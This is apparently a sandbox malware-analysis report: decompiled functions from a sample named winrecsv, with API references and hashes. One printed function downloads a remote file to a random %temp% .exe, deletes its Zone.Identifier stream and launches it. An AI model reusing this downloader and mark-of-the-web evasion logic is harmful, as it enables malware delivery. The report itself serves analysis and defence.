                                                                                   			}






                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _allshl
                                                                                  • String ID:
                                                                                  • API String ID: 435966717-0
                                                                                  • Opcode ID: 1cbd3f30f7551ee80999496264fe97a3fccce00ee31e34d742f1e9c4e4257bfe
                                                                                  • Instruction ID: 50bcbbfbc9b263382ea6c403a771187ef31099e9fa81d89d9fbd392b00d1843e
                                                                                  • Opcode Fuzzy Hash: 1cbd3f30f7551ee80999496264fe97a3fccce00ee31e34d742f1e9c4e4257bfe
                                                                                  • Instruction Fuzzy Hash: CDF08132A01028EB8720EEEFC4428CAF7E69F88364B118136F818E7660E9709C1547F2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 29%
                                                                                  			/* Completion-port worker loop: waits on the I/O completion port stored at offset 8 of
                                                                                  			   the context object and hands every dequeued packet to E0040EBE0. A NULL completion
                                                                                  			   key terminates the loop. */
                                                                                  			E0040EDD0(char _a4) {
                                                                                  				long _v4;                    /* bytes transferred */
                                                                                  				struct _OVERLAPPED* _v8;     /* OVERLAPPED of the completed operation */
                                                                                  				long _v12;                   /* completion key: per-connection object, 0 = stop */
                                                                                  				void* __ebx;
                                                                                  				signed int _t31;
                                                                                  				signed int _t32;
                                                                                  				signed int _t36;
                                                                                  				struct _OVERLAPPED* _t38;
                                                                                  				long _t43;
                                                                                  				char _t51;
                                                                                  				struct _OVERLAPPED* _t52;    /* Winsock error pushed for the handler, 0 on success */
                                                                                  				long* _t54;
                                                                                  
                                                                                  				_t54 =  &_v12;
                                                                                  				_t51 = _a4;
                                                                                  				_t52 = 0;
                                                                                  				_v4 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				/* 0xffffffff = INFINITE: the thread blocks until a packet is posted to the port */
                                                                                  				_t31 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                  				_t43 = _v12;
                                                                                  				_t32 = _t31 & 0xffffff00 | _t31 != 0x00000000;   /* normalise the BOOL result to 0/1 */
                                                                                  				if(_t43 == 0) {
                                                                                  					return _t32;                                  /* NULL key: shutdown request */
                                                                                  				}
                                                                                  				do {
                                                                                  					if(_t32 == 0) {
                                                                                  						/* Dequeue reported failure: query the real result of the overlapped operation
                                                                                  						   on the socket stored at +0x260 of the connection object */
                                                                                  						_t38 =  *((intOrPtr*)(_t43 + 0x260));
                                                                                  						__imp__WSAGetOverlappedResult(_t38, _v8,  &_v4, 0,  &_a4);
                                                                                  						if(_t38 == 0) {
                                                                                  							__imp__#111();                            /* WS2_32 ordinal 111 = WSAGetLastError */
                                                                                  							_t52 = _t38;
                                                                                  						}
                                                                                  					}
                                                                                  					_push(_t52);
                                                                                  					E0040EBE0(_v8, _v4, _v12);                     /* handler(overlapped, bytes, key, error) */
                                                                                  					_t54 =  &(_t54[1]);
                                                                                  					_t52 = 0;
                                                                                  					_v4 = 0;
                                                                                  					_v12 = 0;
                                                                                  					_v8 = 0;
                                                                                  					_t36 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                  					_t43 = _v12;
                                                                                  					_t32 = _t36 & 0xffffff00 | _t36 != 0x00000000;
                                                                                  				} while (_t43 != 0);
                                                                                  				return _t32;
                                                                                  			}
                                                                                  0x0040edd0
                                                                                  0x0040eddc
                                                                                  0x0040edf3
                                                                                  0x0040edf7
                                                                                  0x0040edfb
                                                                                  0x0040edff
                                                                                  0x0040ee03
                                                                                  0x0040ee05
                                                                                  0x0040ee0b
                                                                                  0x0040ee10
                                                                                  0x0040ee8f
                                                                                  0x0040ee8f
                                                                                  0x0040ee13
                                                                                  0x0040ee15
                                                                                  0x0040ee27
                                                                                  0x0040ee2f
                                                                                  0x0040ee37
                                                                                  0x0040ee39
                                                                                  0x0040ee3f
                                                                                  0x0040ee3f
                                                                                  0x0040ee37
                                                                                  0x0040ee4d
                                                                                  0x0040ee4e
                                                                                  0x0040ee53
                                                                                  0x0040ee69
                                                                                  0x0040ee6d
                                                                                  0x0040ee71
                                                                                  0x0040ee75
                                                                                  0x0040ee79
                                                                                  0x0040ee7b
                                                                                  0x0040ee81
                                                                                  0x0040ee84
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EE03
                                                                                  • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 0040EE2F
                                                                                  • WSAGetLastError.WS2_32 ref: 0040EE39
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EE79
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                  • String ID:
                                                                                  • API String ID: 2074799992-0
                                                                                  • Opcode ID: 934002097b16c1c95371fc30c5450db7fcfe2a36d2d131b5e556e9a6edb65e07
                                                                                  • Instruction ID: bb54af95703917af121ac1969caf4c30c918fe6ab3e07cce6cf93c7135daf7d6
                                                                                  • Opcode Fuzzy Hash: 934002097b16c1c95371fc30c5450db7fcfe2a36d2d131b5e556e9a6edb65e07
                                                                                  • Instruction Fuzzy Hash: 6D2151B15083159BC200CF55D840D5BB7E8BFCCB54F044A1EF598A3250D734EA49CBAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040EB08
                                                                                  • WSAGetLastError.WS2_32(?,?,0040F024), ref: 0040EB10
                                                                                  • Sleep.KERNEL32(00000001,?,?,0040F024), ref: 0040EB26
                                                                                  • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040EB4C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Recv$ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 3668019968-0
                                                                                  • Opcode ID: 584b1ce09b420e9e2de366af99c2cd800ce9cb2dbd96c11a390fb674005bc2a6
                                                                                  • Instruction ID: d9337b9861168a889e2dcd888c4c975a75ea967e12d624b3d4e9d1b891e0ae49
                                                                                  • Opcode Fuzzy Hash: 584b1ce09b420e9e2de366af99c2cd800ce9cb2dbd96c11a390fb674005bc2a6
                                                                                  • Instruction Fuzzy Hash: 99117972104301AFD710DF65EC84AEBB7ECEB88710F40092AF556D2140E6B9E94997B6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E98C
                                                                                  • WSAGetLastError.WS2_32 ref: 0040E992
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040E9A8
                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E9CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Send$ErrorLastSleep
                                                                                  • String ID:
                                                                                  • API String ID: 2121970615-0
                                                                                  • Opcode ID: 0ba0aeec6b418c745fd099ee868048f24ecf67a0600923152052274fd2a13465
                                                                                  • Instruction ID: 07d4f8ca9de2ad22a8725cccf1b5422178c79e7604c05c206d14e21095614f42
                                                                                  • Opcode Fuzzy Hash: 0ba0aeec6b418c745fd099ee868048f24ecf67a0600923152052274fd2a13465
                                                                                  • Instruction Fuzzy Hash: D3014F712483056BE6308B96DC88FDB77A8EBC8711F00882AF608D61C0D6B5E9459B69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			/* Unlinks a connection node (__esi) from the doubly linked list owned by the context
                                                                                  			   object read from the caller's stack (prev at +0x34, next at +0x38, list head at
                                                                                  			   ctx+0x25c) and releases it, all under the critical section at ctx+0x244.
                                                                                  			   Returns 1 if the node was absent or released, 0 if it is still referenced. */
                                                                                  			E0040E620(void* __esi) {
                                                                                  				intOrPtr _t13;
                                                                                  				intOrPtr _t19;
                                                                                  				struct _CRITICAL_SECTION* _t21;
                                                                                  				void* _t22;
                                                                                  				intOrPtr _t23;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_t22 = __esi;
                                                                                  				_t23 =  *((intOrPtr*)(_t24 + 0xc));          /* context object from the caller's stack */
                                                                                  				_t21 = _t23 + 0x244;
                                                                                  				EnterCriticalSection(_t21);
                                                                                  				if(__esi == 0) {
                                                                                  					L9:
                                                                                  					LeaveCriticalSection(_t21);
                                                                                  					return 1;
                                                                                  				} else {
                                                                                  					/* InterlockedExchangeAdd(p, 0) is an atomic read of the reference count at +0x14 */
                                                                                  					if(InterlockedExchangeAdd(__esi + 0x14, 0) == 0) {
                                                                                  						_t13 =  *((intOrPtr*)(__esi + 0x38));     /* next */
                                                                                  						_t19 =  *((intOrPtr*)(__esi + 0x34));     /* prev */
                                                                                  						if(_t13 != 0) {
                                                                                  							 *((intOrPtr*)(_t13 + 0x34)) = _t19;    /* next->prev = prev */
                                                                                  						}
                                                                                  						if(_t19 == 0) {
                                                                                  							 *((intOrPtr*)(_t23 + 0x25c)) = _t13;   /* node was the head: head = next */
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_t19 + 0x38)) = _t13;    /* prev->next = next */
                                                                                  						}
                                                                                  						E00408FB0( *((intOrPtr*)(_t22 + 0x2c)));  /* release the buffer at +0x2c, then the node */
                                                                                  						E00408FB0(_t22);
                                                                                  						goto L9;
                                                                                  					} else {
                                                                                  						LeaveCriticalSection(_t21);
                                                                                  						return 0;                                 /* still referenced, not released */
                                                                                  					}
                                                                                  				}
                                                                                  			}
                                                                                  0x0040e620
                                                                                  0x0040e622
                                                                                  0x0040e627
                                                                                  0x0040e630
                                                                                  0x0040e638
                                                                                  0x0040e687
                                                                                  0x0040e688
                                                                                  0x0040e693
                                                                                  0x0040e63a
                                                                                  0x0040e648
                                                                                  0x0040e659
                                                                                  0x0040e65c
                                                                                  0x0040e661
                                                                                  0x0040e663
                                                                                  0x0040e663
                                                                                  0x0040e668
                                                                                  0x0040e66f
                                                                                  0x0040e66a
                                                                                  0x0040e66a
                                                                                  0x0040e66a
                                                                                  0x0040e679
                                                                                  0x0040e67f
                                                                                  0x00000000
                                                                                  0x0040e64a
                                                                                  0x0040e64d
                                                                                  0x0040e658
                                                                                  0x0040e658
                                                                                  0x0040e648

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,0040E6EC,?,?), ref: 0040E630
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E640
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E6EC,?,?), ref: 0040E64D
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E6EC,?,?), ref: 0040E688
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                  • String ID:
                                                                                  • API String ID: 2223660684-0
                                                                                  • Opcode ID: 568366aa594a7e090c346f50c8157628f63c69297310b48d1b7581492236b14c
                                                                                  • Instruction ID: abaa9db80c897440a89c5e3e6cf5373dc13695b231f21a650e9875a219e15b50
                                                                                  • Opcode Fuzzy Hash: 568366aa594a7e090c346f50c8157628f63c69297310b48d1b7581492236b14c
                                                                                  • Instruction Fuzzy Hash: 8E01F236242304AFC3209F32FD44A9BB3A8AF95B11B40493FE846D3641DB3AE401CB28
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			/* Destroys a handle table: the object holds a count at +0, a CRITICAL_SECTION at +4
                                                                                  			   and a pointer to a HANDLE array at +0x1c. Every handle is closed under the lock,
                                                                                  			   the lock is deleted and both the array and the object are released via E00408FB0. */
                                                                                  			E0040C180(intOrPtr* _a4) {
                                                                                  				intOrPtr* _v8;
                                                                                  				signed int _v12;
                                                                                  				intOrPtr* _t11;     /* &object->handles (left undeclared in the raw decompiler output) */
                                                                                  				intOrPtr* _t18;
                                                                                  				void* _t20;
                                                                                  
                                                                                  				if(_a4 != 0) {
                                                                                  					_v8 = _a4;
                                                                                  					EnterCriticalSection(_v8 + 4);
                                                                                  					_v12 = 0;
                                                                                  					while(_v12 <  *_v8) {                          /* *_v8 = number of handles */
                                                                                  						_t11 = _v8 + 0x1c; // 0xfe5ae850
                                                                                  						CloseHandle( *( *_t11 + _v12 * 4));        /* handles[_v12] */
                                                                                  						_v12 = _v12 + 1;
                                                                                  					}
                                                                                  					LeaveCriticalSection(_v8 + 4);
                                                                                  					DeleteCriticalSection(_v8 + 4);
                                                                                  					_t18 = _v8 + 0x1c; // 0xfe5ae850
                                                                                  					E00408FB0( *_t18);                             /* release the handle array */
                                                                                  					return E00408FB0(_a4);                         /* release the object itself */
                                                                                  				}
                                                                                  				return _t20;                                       /* _t20 is never assigned: no meaningful return value on this path */
                                                                                  			}
                                                                                  0x0040c18a
                                                                                  0x0040c18f
                                                                                  0x0040c199
                                                                                  0x0040c19f
                                                                                  0x0040c1b1
                                                                                  0x0040c1be
                                                                                  0x0040c1c8
                                                                                  0x0040c1ae
                                                                                  0x0040c1ae
                                                                                  0x0040c1d7
                                                                                  0x0040c1e4
                                                                                  0x0040c1ed
                                                                                  0x0040c1f1
                                                                                  0x00000000
                                                                                  0x0040c202
                                                                                  0x0040c208

                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(0040F020), ref: 0040C199
                                                                                  • CloseHandle.KERNEL32(0040F024), ref: 0040C1C8
                                                                                  • LeaveCriticalSection.KERNEL32(0040F020), ref: 0040C1D7
                                                                                  • DeleteCriticalSection.KERNEL32(0040F020), ref: 0040C1E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3102160386-0
                                                                                  • Opcode ID: 5479a2aecdec3c162fe58c090ae0b7b4b4a14a4308e56509973f6bbdd8d0498c
                                                                                  • Instruction ID: 7eb137a9147c1387d79ab9d68254bdb898acac70a3962359ff170d5c72b28224
                                                                                  • Opcode Fuzzy Hash: 5479a2aecdec3c162fe58c090ae0b7b4b4a14a4308e56509973f6bbdd8d0498c
                                                                                  • Instruction Fuzzy Hash: F8116174900208EFDB08DFA4D984A9DB775FF84309F2081A9E8066B341DB39EE80DF85
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 66%
                                                                                  			E0040CFE0(char* _a4) {
                                                                                  				char _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				char _v16;
                                                                                  				intOrPtr* _v20;
                                                                                  				void* _v24;
                                                                                  				void* _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				intOrPtr _t44;
                                                                                  				intOrPtr* _t46;
                                                                                  				intOrPtr _t59;
                                                                                  				intOrPtr _t62;
                                                                                  				void* _t88;
                                                                                  				void* _t89;
                                                                                  				void* _t90;
                                                                                  
                                                                                  				_v16 = 0;
                                                                                  				_t44 = E0040C610(_a4,  &_v8);
                                                                                  				_t89 = _t88 + 8;
                                                                                  				_v12 = _t44;
                                                                                  				if(_v12 != 0) {
                                                                                  					_t46 = E0040C3B0(_v12);
                                                                                  					_t90 = _t89 + 4;
                                                                                  					_v20 = _t46;
                                                                                  					if(_v20 != 0) {
                                                                                  						_v24 = 0;
                                                                                  						_push( &_v24);
                                                                                  						_push(_v20);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xb4))))() == 0 && _v24 != 0) {
                                                                                  							_v28 = 0;
                                                                                  							_push( &_v28);
                                                                                  							_push(_v24);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x30))))() == 0 && _v28 != 0) {
                                                                                  								_t59 = E0040CF90(_v28);
                                                                                  								_t90 = _t90 + 4;
                                                                                  								_v32 = _t59;
                                                                                  								if(_v32 != 0) {
                                                                                  									_t62 = E0040CE70(_v28);
                                                                                  									_t90 = _t90 + 4;
                                                                                  									_v36 = _t62;
                                                                                  									if(_v36 != 0) {
                                                                                  										E0040B790( &_v16, "%S%S", _v32);
                                                                                  										_t90 = _t90 + 0x10;
                                                                                  										__imp__#6(_v36, _v36);
                                                                                  									}
                                                                                  									__imp__#6(_v32);
                                                                                  								}
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  							}
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                  						}
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  					}
                                                                                  					E00408FB0(_v12);
                                                                                  				}
                                                                                  				return _v16;
                                                                                  			}
                                                                                  0x0040cfe6
                                                                                  0x0040cff5
                                                                                  0x0040cffa
                                                                                  0x0040cffd
                                                                                  0x0040d004
                                                                                  0x0040d00e
                                                                                  0x0040d013
                                                                                  0x0040d016
                                                                                  0x0040d01d
                                                                                  0x0040d023
                                                                                  0x0040d02d
                                                                                  0x0040d036
                                                                                  0x0040d041
                                                                                  0x0040d051
                                                                                  0x0040d05b
                                                                                  0x0040d064
                                                                                  0x0040d06c
                                                                                  0x0040d078
                                                                                  0x0040d07d
                                                                                  0x0040d080
                                                                                  0x0040d087
                                                                                  0x0040d08d
                                                                                  0x0040d092
                                                                                  0x0040d095
                                                                                  0x0040d09c
                                                                                  0x0040d0af
                                                                                  0x0040d0b4
                                                                                  0x0040d0bb
                                                                                  0x0040d0bb
                                                                                  0x0040d0c5
                                                                                  0x0040d0c5
                                                                                  0x0040d0d7
                                                                                  0x0040d0d7
                                                                                  0x0040d0e5
                                                                                  0x0040d0e5
                                                                                  0x0040d0f3
                                                                                  0x0040d0f3
                                                                                  0x0040d0f9
                                                                                  0x0040d0fe
                                                                                  0x0040d107

                                                                                  APIs
                                                                                    • Part of subcall function 0040C610: memset.NTDLL ref: 0040C638
                                                                                    • Part of subcall function 0040C610: InternetCrackUrlA.WININET(0040D429,00000000,10000000,0000003C), ref: 0040C688
                                                                                    • Part of subcall function 0040C610: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040C698
                                                                                    • Part of subcall function 0040C610: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040C6D1
                                                                                    • Part of subcall function 0040C610: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C707
                                                                                    • Part of subcall function 0040C610: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040C72F
                                                                                    • Part of subcall function 0040C610: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040C778
                                                                                    • Part of subcall function 0040C610: InternetCloseHandle.WININET(00000000), ref: 0040C807
                                                                                    • Part of subcall function 0040C3B0: SysAllocString.OLEAUT32(00000000), ref: 0040C3DE
                                                                                    • Part of subcall function 0040C3B0: CoCreateInstance.OLE32(00410328,00000000,00004401,00410318,00000000), ref: 0040C406
                                                                                    • Part of subcall function 0040C3B0: SysFreeString.OLEAUT32(00000000), ref: 0040C4A1
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040D0BB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040D0C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                  • String ID: %S%S
                                                                                  • API String ID: 1017111014-3267608656
                                                                                  • Opcode ID: b9efebc393b8cab70bab4711f02a4fc852ff42516b9a7e65ccb39fe286daf9b4
                                                                                  • Instruction ID: 8f39198d2c77811fae4d9ce9e1f2edbe33952e684686135c492452eaad7f6a38
                                                                                  • Opcode Fuzzy Hash: b9efebc393b8cab70bab4711f02a4fc852ff42516b9a7e65ccb39fe286daf9b4
                                                                                  • Instruction Fuzzy Hash: CC412CB5D00209DFCB04DBD4C885AEFB7B5BF88308F108569E505B7391D739AA85CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Callgraph

                                                                                  • Function_010D147C -> Function_010D15FB, Function_010D15E6, Function_010D13E0
                                                                                  • Function_010D13E0 -> Function_010D1000, Function_010D1380, Function_010D10B0
                                                                                  • Function_010D10B0 -> Function_010D1000
                                                                                  • Function_010D15CE, Function_010D15F8: no call edges recorded

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 78%
                                                                                  			E010D10B0(WCHAR* _a4) {
                                                                                  				void _v268;
                                                                                  				short _v788;
                                                                                  				signed int _v789;
                                                                                  				void* _v796;
                                                                                  				void* _v800;
                                                                                  				short _v1324;
                                                                                  				long _v1328;
                                                                                  				long _v1332;
                                                                                  				void* _v1336;
                                                                                  				short _v1860;
                                                                                  				signed int _t65;
                                                                                  				signed int _t68;
                                                                                  				signed int _t70;
                                                                                  				void* _t74;
                                                                                  				int _t75;
                                                                                  				signed int _t76;
                                                                                  				signed int _t78;
                                                                                  				signed int _t80;
                                                                                  				void* _t88;
                                                                                  				void* _t92;
                                                                                  				signed char _t101;
                                                                                  				void* _t145;
                                                                                  				void* _t147;
                                                                                  
                                                                                  				srand(GetTickCount());
                                                                                  				_t65 = rand();
                                                                                  				asm("cdq");
                                                                                  				Sleep(0x2710 + _t65 % 0xea60 * 0xf); // executed
                                                                                  				_v789 = 0;
                                                                                  				ExpandEnvironmentStringsW(L"%temp%",  &_v788, 0x104);
                                                                                  				_t68 = rand();
                                                                                  				asm("cdq");
                                                                                  				_t70 = rand();
                                                                                  				asm("cdq");
                                                                                  				wsprintfW( &_v1860, L"%s\\%d%d.exe",  &_v788, _t70 % 0x7530 + 0x2710, _t68 % 0x7530 + 0x2710);
                                                                                  				_t147 = _t145 + 0x18;
                                                                                  				_t74 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", 0, 0, 0, 0); // executed
                                                                                  				_v1336 = _t74;
                                                                                  				if(_v1336 == 0) {
                                                                                  					L10:
                                                                                  					_t75 = InternetCloseHandle(_v1336);
                                                                                  					Sleep(0x1f4); // executed
                                                                                  					if((_v789 & 0x000000ff) != 0) {
                                                                                  						L13:
                                                                                  						return _t75;
                                                                                  					}
                                                                                  					_t76 = rand();
                                                                                  					asm("cdq");
                                                                                  					Sleep(0x2710 + _t76 % 0xea60 * 0xf); // executed
                                                                                  					_t78 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t80 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t75 = wsprintfW( &_v1860, L"%s\\%d%d.exe",  &_v788, _t80 % 0x7530 + 0x2710, _t78 % 0x7530 + 0x2710);
                                                                                  					_push(0);
                                                                                  					_push(0);
                                                                                  					_push( &_v1860);
                                                                                  					_push(_a4);
                                                                                  					_push(0); // executed
                                                                                  					L010D160C(); // executed
                                                                                  					if(_t75 != 0) {
                                                                                  						goto L13;
                                                                                  					}
                                                                                  					wsprintfW( &_v1324, L"%s:Zone.Identifier",  &_v1860);
                                                                                  					DeleteFileW( &_v1324);
                                                                                  					return E010D1000( &_v1860);
                                                                                  				}
                                                                                  				_t88 = InternetOpenUrlW(_v1336, _a4, 0, 0, 0, 0); // executed
                                                                                  				_v796 = _t88;
                                                                                  				if(_v796 == 0) {
                                                                                  					L9:
                                                                                  					InternetCloseHandle(_v796);
                                                                                  					goto L10;
                                                                                  				}
                                                                                  				_t92 = CreateFileW( &_v1860, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                  				_v800 = _t92;
                                                                                  				if(_v800 == 0xffffffff) {
                                                                                  					L8:
                                                                                  					FindCloseChangeNotification(_v800); // executed
                                                                                  					goto L9;
                                                                                  				}
                                                                                  				while(InternetReadFile(_v796,  &_v268, 0x103,  &_v1332) != 0 && _v1332 != 0) {
                                                                                  					WriteFile(_v800,  &_v268, _v1332,  &_v1328, 0); // executed
                                                                                  				}
                                                                                  				FindCloseChangeNotification(_v800); // executed
                                                                                  				Sleep(0x3e8); // executed
                                                                                  				wsprintfW( &_v1324, L"%s:Zone.Identifier",  &_v1860);
                                                                                  				DeleteFileW( &_v1324); // executed
                                                                                  				Sleep(0x3e8); // executed
                                                                                  				_t101 = E010D1000( &_v1860); // executed
                                                                                  				_t147 = _t147 + 0x10;
                                                                                  				if((_t101 & 0x000000ff) == 1) {
                                                                                  					_v789 = 1;
                                                                                  				}
                                                                                  				goto L8;
                                                                                  			}
                                                                                  0x010d10c0
                                                                                  0x010d10c8
                                                                                  0x010d10cd
                                                                                  0x010d10df
                                                                                  0x010d10e5
                                                                                  0x010d10fd
                                                                                  0x010d1103
                                                                                  0x010d1108
                                                                                  0x010d1117
                                                                                  0x010d111c
                                                                                  0x010d113e
                                                                                  0x010d1144
                                                                                  0x010d1154
                                                                                  0x010d115a
                                                                                  0x010d1167
                                                                                  0x010d129f
                                                                                  0x010d12a6
                                                                                  0x010d12b1
                                                                                  0x010d12c0
                                                                                  0x010d137c
                                                                                  0x010d137c
                                                                                  0x010d137c
                                                                                  0x010d12c6
                                                                                  0x010d12cb
                                                                                  0x010d12dd
                                                                                  0x010d12e3
                                                                                  0x010d12e8
                                                                                  0x010d12f7
                                                                                  0x010d12fc
                                                                                  0x010d131e
                                                                                  0x010d1327
                                                                                  0x010d1329
                                                                                  0x010d1331
                                                                                  0x010d1335
                                                                                  0x010d1336
                                                                                  0x010d1338
                                                                                  0x010d133f
                                                                                  0x00000000
                                                                                  0x00000000
